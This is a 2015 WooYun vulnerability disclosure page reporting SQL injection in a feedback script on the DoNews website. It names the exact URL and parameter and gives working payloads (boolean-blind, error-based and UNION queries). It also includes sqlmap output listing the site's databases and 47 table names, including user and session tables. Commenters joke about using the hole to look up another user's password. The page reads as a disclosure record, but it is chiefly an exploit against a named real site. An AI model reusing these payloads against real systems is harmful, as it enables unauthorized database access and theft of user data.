当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118206

漏洞标题:DoNews主站存在SQL注射全站数据库

相关厂商:DoNews

漏洞作者: 路人甲

提交时间:2015-06-04 14:53

修复时间:2015-06-09 14:54

公开时间:2015-06-09 14:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-04: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

233

详细说明:

http://www.donews.com/specialqc/tool/feedback.php?bid=1

漏洞证明:

---
Parameter: bid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bid=1 AND 2040=2040
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: bid=1 AND (SELECT 5418 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(5418=5418,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: Generic UNION query (NULL) - 21 columns
Payload: bid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a7671,0x467a46514f505a475662,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
available databases [9]:
[*] donews
[*] donews_appservice
[*] donews_chenfeng
[*] donewsblog
[*] information_schema
[*] mysql
[*] niukeji
[*] niukeji_bug
[*] performance_schema
Database: donews
[47 tables]
+--------------------------------------+
| attachments_attachments |
| attachments_attachments_tags |
| attachments_category |
| auth_group |
| auth_group_permissions |
| auth_permission |
| auth_user |
| auth_user_groups |
| auth_user_user_permissions |
| blackboard_blackboard |
| blacklist |
| columns_columns |
| comments_category |
| comments_comments |
| config |
| django_admin_log |
| django_content_type |
| django_session |
| django_site |
| feedback |
| ftps_ftps |
| ftps_ftps_category |
| imgrepertory |
| info_profile |
| logs_logs |
| news_news |
| news_news_tags |
| news_news_uploads |
| permissions_columnscategory |
| permissions_columnspermissions |
| permissions_modulescategory |
| permissions_modulespermissions |
| picset |
| report_report |
| sections_category |
| sections_data |
| sections_sections |
| sitetemplates_sitetemplates |
| sitetemplates_sitetemplates_category |
| special_special |
| special_special_tags |
| sph_counter |
| tags_category |
| tags_tags |
| votelog |
| votesys |
| workload_workload |
+--------------------------------------+

修复方案:

~~~~厂商放弃自己了?

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-09 14:54

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-04 19:12 | xyang ( 普通白帽子 | Rank:242 漏洞数:51 | stay hungry stay foolish)

    尼玛,我昨天才关注它微信号,你就射进去了

  2. 2015-06-04 19:35 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @xyang 是么?你电话多少,我查下你密码。

  3. 2015-06-04 19:36 | 小哇 ( 路人 | Rank:2 漏洞数:1 | 一个对所有电脑相关都感兴趣的家伙)

    @紫霞仙子 要不要这样……

  4. 2015-06-04 19:57 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @紫霞仙子 被忽略的几率很高。。。。

  5. 2015-06-04 20:03 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @’‘Nome 是啊,只能。。。。。。。。。。